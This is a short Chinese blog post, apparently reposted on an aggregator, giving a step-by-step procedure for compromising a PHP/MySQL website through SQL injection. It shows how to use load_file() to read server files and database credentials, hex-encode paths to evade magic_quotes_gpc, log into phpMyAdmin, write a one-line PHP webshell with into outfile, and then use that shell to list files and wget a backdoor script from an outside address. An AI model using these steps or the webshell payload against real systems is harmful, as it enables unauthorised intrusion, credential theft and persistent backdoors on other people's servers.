php mysql下的load_file函数与into_out函数

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php mysql下的load_file函数与into_out函数相关的知识,希望对你有一定的参考价值。

1.mysql用户的权限(mysql.user里可以查看),file_priv,可以对系统文件进行读写,当然这个文件要是当前的系统用户有读写权限的。

2.Load_file()函数,读取文件内容

3.Into outfile(导出字符类型的文件,如文本文件)into dumpfile(可以导出二进制,如执行文件)可以导出数据库内容到文件

4.一句话木马,<?php system($_REQUEST[cmd];)?>可以执行系统命令

5.鼠标放网站链接上,在下面状态栏看到php?id=一般说明与数据库交互

6在显示位上用user()可以显示当前用户,database()显示当前数据库名称,version()数据库版本(@@version)@@basedir(显示数据库安装路径)@@datadir数据库的数据路径

7如果在显示位上用load_file()加载物理路径(因为magic_quotes_gpc可能是打开的转换成十六进制后可以绕过它的限制,所以要转换成十六进制)出来的没有数据库信息的话,那么它包含的文件一般都有数据库连接信息等,再用load_file()加载包含的文件(依旧转换成十六进制)

8MySQL除了企业版是不可以远程连接的,一般都有phpmyadmin,一般在网站URL后面加上phpmyadmin

9利用load_file()加载出包含文件里的用户名密码登录phpmyadmin ,创建新的数据库,表,字段,然后再在该数据库中执行语句select  *  from beach  into   outfile  网站的绝对路径/导出文件的文件名(自己随便创建创建)

10.访问网站的绝对路径/导出的文件名.php?看是否导出成功

访问网站的绝对路径/导出的文件名.php?创建的字段=ls  列出路径下的所有文件

11wget这个软件下载脚本后门:网站的绝对路径/导出的文件名.php?创建的字段=wget+下载的地址

12.下载完成后用网站的绝对路径/导出的文件名.php?创建的字段=ls  列出路径下的所有文件看是否下载成功。

13.用网站的绝对路径/导出的文件名.php?创建的字段=mv+原文件名+新文件名

14.访问网站的绝对路径/新文件名登录脚本后门即可(可用网站的绝对路径/导出的文件名.php?创建的字段=cat ./新创建的文件名查看脚本后门的密码)

以上是关于php mysql下的load_file函数与into_out函数的主要内容,如果未能解决你的问题,请参考以下文章

MySQL注入Load_File()函数应用

mysql中函数load_file()问题

Load_file 常用路径

任何网络用户如何安装或更改 MySQL 以使用函数“load_file”?

[转]php mysql注入load_file IIS配置文件获取后台地址

Mysql渗透技巧总结